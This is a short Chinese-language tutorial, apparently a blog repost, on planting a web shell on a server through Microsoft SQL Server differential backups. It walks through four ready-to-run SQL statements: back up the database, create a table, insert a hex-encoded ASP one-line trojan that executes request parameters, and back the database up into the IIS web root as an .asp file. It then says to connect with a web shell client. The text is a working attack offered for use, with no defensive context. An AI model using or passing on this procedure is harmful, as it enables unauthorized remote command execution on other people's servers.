mssql差异备份拿shell

(1)首先:

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s;

注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换

这里的数据库名字是:Newport 转换后就是:4e6577706f7274


(2)

create table [dbo].[hack520] ([cmd] [image]);

注意:这个是创建一个表

(3)

insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E);

这个在数据库中插入一句话木马:其中:0x3C2565786563757465207265717565737428226C2229253E 是木马内容的十六进制数字,也用hackbar 进行转换

这里的一句话的内容是:<%execute request("l")%> 转换之后:3C2565786563757465207265717565737428226C2229253E

(4)

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433a5c696e65747075625c777777726f6f745c686568652e617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

这个是将带木马的文件备份到网站路径底下:其中:433a5c696e65747075625c777777726f6f745c686568652e617370是一句话木马的绝对路径的十六进制的数字,同样的也用hackbar进行转换

这里的一句话的绝对路径是:C:\inetpub\wwwroot\hehe.asp 转换之后:433a5c696e65747075625c777777726f6f745c686568652e617370


到这里,整个过程就结束了,用菜刀访问一下:


mssql差异备份拿shell_第1张图片


你可能感兴趣的:(安全)